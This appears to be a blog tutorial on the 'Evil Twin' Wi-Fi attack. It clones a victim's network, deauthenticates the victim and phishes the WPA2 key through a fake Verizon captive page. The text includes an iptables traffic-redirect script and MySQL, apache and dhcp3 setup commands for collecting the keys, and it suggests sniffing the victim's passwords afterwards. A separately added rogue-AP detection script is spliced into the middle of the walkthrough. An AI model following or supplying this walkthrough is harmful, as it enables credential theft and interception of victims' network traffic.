#!/bin/sh
# Transparent proxy redirect for a DD-WRT style router (nvram-based LAN settings).
PROXY_IP=[IP]
PROXY_PORT=[PORT]
LAN_IP=`nvram get lan_ipaddr`
LAN_NET=$LAN_IP/`nvram get lan_netmask`
# Send LAN clients' outbound port-80 traffic (anything not addressed to the router itself) to the proxy
iptables -t nat -A PREROUTING -i br0 -s $LAN_NET ! -d $LAN_IP -p tcp --dport 80 -j DNAT --to $PROXY_IP:$PROXY_PORT
# Source-NAT proxy-to-LAN traffic leaving on br0
iptables -t nat -A POSTROUTING -o br0 -s $PROXY_IP -p tcp -d $LAN_NET -j SNAT --to $PROXY_IP
# Allow the forwarded connections to the proxy port
iptables -A FORWARD -i vlan1 -o br0 -s $LAN_NET -d $PROXY_IP -p tcp --dport $PROXY_PORT -j ACCEPT
In an earlier post, we've seen how to crack WPA2 network keys using a dictionary.
While that technique works, it could take an awfully long time, especially when brute forcing.
In this technique, named 'Evil Twin', we take a different perspective on the attack. Using a powerful long-range wireless card (Alfa AWUS036NH), we clone the target network to confuse our victim. Then we deauthenticate the victim from his own wireless network and wait until he connects to our access point, which looks exactly like his. :)
When the victim connects, he is redirected to a service page asking for the WPA2 key in order to access the internet. As soon as we get the key, we can either allow the victim to use the network (maybe improvise some password sniffing?) or just bring it down manually.
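Seen from the other side, the setup described above leaves fingerprints a network owner can check for: a second BSSID beaconing the same SSID, usually open (so the captive page loads) and often louder than the real AP thanks to the high-gain card. The following rogue-AP check is an added example, not part of the original post; the allow-list, BSSIDs and scan records are constructed, and the record shape assumes a survey tool that reports ssid, bssid, channel, security and signal per beacon.

```python
"""Flag evil-twin candidates in a Wi-Fi scan using an allow-list of the BSSIDs
that legitimately serve each managed SSID. All values below are constructed."""

# Constructed allow-list: SSID -> set of authorised BSSIDs (hypothetical values).
AUTHORISED = {
    "HomeNet": {"00:11:22:33:44:55"},
}

# Constructed scan results, shaped like a wireless survey tool's per-beacon output.
SCAN = [
    {"ssid": "HomeNet", "bssid": "00:11:22:33:44:55", "channel": 6,
     "security": "WPA2", "signal": -55},
    {"ssid": "HomeNet", "bssid": "aa:bb:cc:dd:ee:ff", "channel": 6,
     "security": "OPEN", "signal": -38},
    {"ssid": "Neighbour", "bssid": "66:77:88:99:aa:bb", "channel": 11,
     "security": "WPA2", "signal": -70},
]


def find_evil_twins(scan, authorised):
    """Return one finding per beacon that advertises a managed SSID from a BSSID
    not on the allow-list. Each finding lists why it looks like a twin: unknown
    BSSID, encryption dropped (open captive portal), or out-shouting the real AP."""
    # Strongest signal seen from an authorised AP, per SSID.
    legit_signal = {}
    for ap in scan:
        if ap["bssid"] in authorised.get(ap["ssid"], set()):
            prev = legit_signal.get(ap["ssid"], -100)
            legit_signal[ap["ssid"]] = max(prev, ap["signal"])

    findings = []
    for ap in scan:
        allowed = authorised.get(ap["ssid"])
        if allowed is None or ap["bssid"] in allowed:
            continue  # SSID not managed by us, or a known-good AP
        reasons = ["unknown BSSID for a managed SSID"]
        if ap["security"] == "OPEN":
            reasons.append("no encryption while the real network is protected")
        if ap["signal"] > legit_signal.get(ap["ssid"], -100):
            reasons.append("stronger signal than the authorised AP")
        findings.append({"ssid": ap["ssid"], "bssid": ap["bssid"],
                         "channel": ap["channel"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_evil_twins(SCAN, AUTHORISED):
        print(f"{f['ssid']} from {f['bssid']} (ch {f['channel']}): " + "; ".join(f["reasons"]))
```

A client-side corollary of the same check: a WPA2 network that suddenly appears as open, or prompts for the passphrase on a web page instead of in the OS join dialog, is the twin, not the real AP.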
For this example I created a service page based on the Verizon ISP. The files are placed at the default location (/var/www/). I created a database called 'wpa2', which can be done with the following commands:
Log in to MySQL:
mysql -u root -p
Note: Default backtrack user/pass are root/toor
Create the database:
create database wpa2;
use wpa2;
create table content(key1 VARCHAR(64), key2 VARCHAR(64));
Finally, start the apache and mysql services and check that everything works by typing localhost into a web browser.
Commands:
Install dhcp3 and create the config file:
apt-get install dhcp3-server -y
mv /etc/dhcp3/dhcp.conf /etc/dhcp3/dhcp.conf.backup
gedit /etc/dhcp3/dhcp.conf